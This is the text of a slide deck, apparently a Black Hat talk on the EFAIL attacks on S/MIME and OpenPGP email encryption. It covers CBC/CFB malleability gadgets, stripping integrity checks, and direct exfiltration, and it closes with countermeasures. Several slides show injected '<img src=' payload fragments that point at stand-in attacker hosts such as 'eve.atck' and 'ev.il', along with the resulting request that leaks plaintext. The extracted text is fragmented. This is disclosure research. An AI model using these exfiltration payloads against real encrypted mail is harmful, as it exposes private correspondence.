    Content-type: app/encrypted 𝑠𝒌 • Obtainthe encrypted email • Extract ciphertext 𝑘 and ciphertext 𝑐 • Decrypt 𝑘 with private key 𝑠𝑒𝑐 to obtain session key 𝑠 • 𝑠 = 𝑅𝑆𝐴 𝑠𝑒𝑐(𝑘) • Decrypt ciphertext 𝑐 with session key 𝑠 to obtain the cleartext 𝑚 • 𝑚 = 𝐴𝐸𝑆𝑠 𝑐 Dear Alice, thank you for your email. The meeting tomorrow will be at 9 o‘clock. c 22 Hybrid encryption
  • 23.
  • 24.
    𝒄↯ 𝑠 Dear Alice, ????????????????ur efail. Themeeting tomorrow will be at 9 o‘clock. 24 Malleability of CBC/CFB
  • 25.
    Message Authentication Codes(MAC) • Protection against ciphertext tampering • Attacks against MAC-then-Encrypt (Vaudenay) • Attacks against MAC-and-Encrypt (Paterson) 25 Hybrid malleability of CBC/CFG
  • 26.
    26 S/MIME Structure S/MIME: Absenceof authenticated encryption
  • 27.
  • 28.
    28 decryption Zontent-type: te C1 P0' decryption xt/htmlnDear Bob C2 P1 C0' Malleabilityof CBC/CFB A B Q 0 0 0 0 1 1 1 0 1 1 1 0 XOR A B Q 0 0 0 0 1 1 1 0 1 1 1 0
  • 29.
    09.08.2018 29 C0 ⊕P0 decryption 0000000000000000 C1 P0' decryption xt/htmlnDear Bob C2 P1 CBC Gadget Malleability of CBC/CFB
  • 30.
    30 C0 ⊕ P0⊕ Pc decryption <img src=”ev.il/ C1 P0' decryption xt/htmlnDear Bob C2 P1 A B Q 0 0 0 0 1 1 1 0 1 1 1 0 Malleability of CBC/CFB XOR
  • 31.
  • 32.
  • 33.
    Overview 1. Introduction 2. Backchannels 3.Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
  • 34.
  • 35.
    35 ???????????????? <base " ????????????????<img " ???????????????? " href="http:"> Content-type: te xt/htmlnDear Sir or Madam, the se ecret meeting wi ???????????????? " src="efail.de/ Content-type: te xt/htmlnDear Sir or Madam, the se ecret meeting wi ???????????????? "> Original Crafted Changing Duplicating Reordering Practical Attack against S/MIME
  • 36.
  • 37.
    Overview 1. Introduction 2. Backchannels 3.Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
  • 38.
    OpenPGP • OpenPGP usesa variation of CFB-Mode • PGP-Standard has integrity protection • Compression is enabled by default Ci Pi (known) Ci+1 Pi-1 encryption encryption XCi encryption Pc (chosen) random plaintext ? ? ? ? ? ? ? ? encryption 38
  • 39.
    OpenPGP – IntegrityProtection • Integrity Protection is performed by adding an MDC at the end of the packet TAG 18 LENGTH TAG 8 LENGTH TAG 11 LENGTH Content-Type:multipart/mixed; boundary=“ … … TAG 19 LENGTH efa3e9ca54f0879c5b187636c23b7de376a5ba41 <compressed> <encrypted> Tag Type of PGP packet 8 CD: Compressed Data Packet 9 SE: Symmetrically Encrypted Packet 11 LD: Literal Data Packet 18 SEIP: Symmetrically Encrypted and Integrity Protected Packet 19 MDC: Modification Detection Code Packet 39
  • 40.
    RFC4880 on ModificationDetection Codes
  • 41.
    OpenPGP – IntegrityProtection Defeating Integrity Protection Vulnerable Not Vulnerable Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 41
  • 42.
    OpenPGP – Compression •PGP uses compression (DEFLATE) • Makes our life much harder: we do not know so many plaintext bytes • We need to know at least 11 Bytes of the plaintext but only know 4 from the packet headers • But: We can do multiple guesses per Mail • Mostly between 500 to 1,000 „submails“ per mail Content-Type: multipart/mixed; boundary=„BOUNDARY" --BOUNDARY <GUESS_1> --BOUNDARY ... --BOUNDARY <GUESS_N> --BOUNDARY-- 42
  • 43.
  • 44.
    OpenPGP – Compression Content-Type:multipart/alternative; boundary="b1_232f841e30b3b8112f31ed86c8cee5ab" --b1_232f841e30b3b8112f31ed86c8cee5ab Content-Type: text/html; charset="UTF-8" <html> <body> <p>Hello XXX,</p> <p>here is your code: 123456</p> <img src="https://www.facebook.com/email_open_log_pic.php?mid=TRACKING_CODE_HERE"/> </body> </html> --b1_232f841e30b3b8112f31ed86c8cee5ab-- 44
  • 45.
    OpenPGP – Compression FacebookPassword Recovery • Generated 100,000 Password Recovery Emails based on template • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes No. Starts with … % Cumulated % 1 a302789ced590b9014c519 30.95 30.95 2 a302789ced590d9014c515 7.99 38.94 3 a302789ced59099014d519 7.80 46.73 … 211 a302789ced59098c14551a 0.001 100 Content-Type: multipart/mixed; boundary=„BOUNDARY" --BOUNDARY A302789ced590b90... --BOUNDARY A302789ced590d90... --BOUNDARY A302789ced590990... --BOUNDARY-- 45
  • 46.
    OpenPGP – Compression EnronEmail Dataset • Contains approx. 500,000 „real“ Emails1 • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes No. Starts with … % Cumulated % 1 a302789c8d8f4b4ec3400c 6.61 6.61 2 a302789ced90c16e133110 2.21 8.82 3 a302789c7590b14ec33010 0.66 9.48 … 500 a302789c4d90cb8ed34010 0.03 40.99 46 1 https://www.cs.cmu.edu/~enron/
  • 47.
  • 48.
    Impact on thestandards S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 • References EFAIL paper • Recommends the usage of authenticated encryption with AES-GCM OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 • Deprecates Symmetrically Encrypted (SE) data packets • Proposes AEAD protected data packets • Implementations should not allow users to access erroneous data 48
  • 49.
    Overview 1. Introduction 2. Backchannels 3.Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration
  • 50.
    • This attackis possible since 2003 in Thunderbird • Independent of the applied encryption scheme • Somewhat fixable in implementation • But works directly in … • Apple Mail / Mail App • Thunderbird • Postbox • … • The standards do not give any definition for that! Direct exfiltration 50
  • 51.
    Encrypting Alice writes aMail to Bob From: Alice To: Bob Dear Bob, the meeting tomorrow will be at 9 o‘clock. -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Alice’s mail program encrypts the email Direct exfiltration 51
  • 52.
    Encrypting Alice writes aMail to Bob From: Alice To: Bob Dear Bob, the meeting tomorrow will be at 9 o‘clock. -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Alice’s mail program encrypts the email Direct exfiltration 52
  • 53.
    Original E-Mail Eve’s attackE-Mail Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> From: Eve To: Bob From: Alice To: Bob Eve modifies the email and sends it to Bob or Alice Eve captures the encrypted mail between Alice and Bob -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Direct exfiltration 53
  • 54.
    Bob’s mail program decryptsthe email Decrypting Eve’s attack E-Mail Content-Type: text/html <img src="http://eve.atck/ Content-Type: text/html "> From: Eve To: Bob Bob’s mail program puts the clear text back into the body -----BEGIN PGP MESSAGE----- hQIMA1n/0nhVYSIBARAAiIsX1QsH ZObL2LopVexVVZ1uvk3wieArHUg… -----END PGP MESSAGE----- Dear Bob, the meeting tomorrow will be at 9 o‘clock. Direct exfiltration 54
  • 55.
    Eve’s attack E-Mail Content-Type:text/html <img src="http://eve.atck/ Content-Type: text/html "> Content-Type: text/html <img src="http://eve.atck/Dear Bob, the meeting tomorrow will be at 9 o‘clock.“> From: Eve To: Bob GET /Dear%20Bob%2C%0D%0Athe %20meeting%20tomorrow%20will %20be%20at%209%20o%E2%80%98c lock. Eve Direct exfiltration 55
  • 56.
  • 57.
    • New attacksexploiting functionalities between crypto / non-crypto standards • Countermeasures hard to apply: • S/MIME is broken • OpenPGP needs revisions • Recommendations: • Short term: disable HTML • Mid term: patch the clients • Long term: new standards Conclusions 57
  • 58.
    • Crypto standardsneed to evolve • We knew that CBC is dangerous since how long? • Crypto is useless without Authenticated Encryption • HTML email is bad • Writing privacy preserving email clients is hard • Securely embedding PGP and S/MIME is hard • But: EFAIL does not rely on HTML • Engineering lesson • Cryptosystems contain multiple components • All of them may look `sane’ for themselves • When combined, things can easily break Black Hat sound bytes 58 Thank you! Questions? www.efail.de